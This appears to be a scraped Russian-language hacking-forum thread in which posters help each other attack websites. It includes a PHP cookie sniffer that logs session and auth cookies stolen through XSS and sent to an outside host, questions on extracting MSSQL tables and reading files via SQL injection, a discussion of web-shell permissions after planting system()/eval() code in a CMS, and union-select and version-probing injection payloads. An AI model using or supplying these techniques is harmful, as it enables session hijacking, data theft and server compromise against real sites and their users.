Уточняю проблему, у клиентской части скрипт проводит успешно xss инъекцию через POST, и выводит в стиле ***.com/s.php?SESSIONID=0BA480B72D67E063B2FD65FDC66D;%20authlogin=Lol;%20auth=e827b3871c8906ff8973b257bb2e9. Все что после знака ? есть QUERY_STRING, а в сниффаке четко прописано Code: if ($file) { $f = fopen($filename, 'a'); flock($f,2); fputs($f, $QUERY_STRING."\r\n\r\n\r\n"); fflush ($f); flock($f,3); fclose($f); } Почему данные не уплывают на сниффер? P.s. С куниковским сниффаком та же фигня. Я не представляю в чем проблема.
//база MSSQL итак, вернёмся к моим баранам из нужной базы которая называется accountinfo, вот этим запросом, я вытянул названи нужной мне таблицы она под номером 0 под названием sales_rpt затем из этой таблицы я получил нужную мне колонку она тоже под номером 0 и называется accumulated_rp так вот, в этой же базе под номером 7 таблица AccountInfo из которой мне нужно вывести колонки, но у меня не получается вывести колонки. как правильно заепашить запрос? пробовал так но не выводит
Есть инъекция, делаю запрос на load_file и ничего не выходит, Что делаю нетак? двойной запрос.. запрос на просмотр таблиц выглядит так:
Ты нифига не читаешь. Даже мою подпись двойной запрос, лоад_файл.... У меня возле компьютера стоит чашка с кофе, почему телефон не звонит, ведь сигареты кончились?
Собственно интересует вопрос по разграничению прав не веб-сервере. Какие права присваиваются например веб-шеллу который исполняется по средствам например eval, т.е. например есть CMS через которую можно добавить какую-либо запись на сайт, и она записывается в БД к примеру так Code: ---------------------------------------------- | id | author | text | ---------------------------------------------- | 22 | joker1 | <?phpinfo()?> | ---------------------------------------------- ну и выводится так: PHP: <html> <head> </head> <body> <?php // запрос к БД который получение данных например // в массив и импортированный например extract() и вот на выходе имеется ?> <br>автор: <?php echo $id; ?> <br>текст:</br> <?php echo $text; ?> </body> </html> ну или подобный вариант с eval только вывод будет немного иначе. ну и соответственно что динамически присваивается id и доступен по адресу например index?id=[num] Какие права будут у этого допустим веб-шелла, если как вы понимаете указать тот же system() или eval()? Если например ему присвоются права index.php, то почему например на практике, это срабатывает не всегда, когда например у того же index.php права 777
вобще-то: права пользователя, от имени которого запущен веб-сервер. Исключения - при использовании suexec и т.п. Быть может ты хотел узнать кто будет владельцем файла и я не так истолковал твой вопрос?))
эм права у чего? ты о чем? у index.php нет прав. ты путаешь права пользователя на доступ(чтение, запись, исполнение) к файлам и аттрибуты файла показывающие каким пользователям разрешен доступ(чтение, запись, исполнение) к файлу. Code: man chmod и вообще почитай как-нибудь книгу о *nix'ax. как я понял вопрос - так я на него и ответил
Что скажите по этой ошибке? Похоже какая-то проблема со скобками? Couldn't execute query: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'union select 1))' at line 1 так нормально ...id=36+and+1=0 так ошибка ...id=36+and+1=0+union+select+1
попробуй так: ...id=36+and+1=0+and+substring(version(),1,1)=5 ...id=36+and+1=0+and+substring(version(),1,1)=4 ...id=36+and+1=0+and+substring(version(),1,1)=3 плюс различные фильтры "--+", "/*", "#" (версию выясни для начала)
ну я сразу подумал про подзапросы... но хз что там как... ?id=36)) уже ошибка Couldn't execute query: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '))' at line 1
Нет, Вы не так поняли. Просто попробуйте в допустим CMS Drupal создать новость со встроенным веб-шеллом, и у него не хватит прав на исполнение, ни чтение, ни запись, ничего.
пробовал комментарии /*, -- и # там не работают Couldn't execute query: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'union select 1 -- ))' at line 1
подскажите, насколько я понимаю, если на сайте включён mod Rewrite, то бесполезно искать уязвимость типа SQL injection ? к примеру сайт даёт http://site.ru/news/36 но нра самом деле отсюдова идёт реврайт на скрипт http://site.ru/news/index.php?id=36 если же есть способ, озвучьте его, пожалуйста.
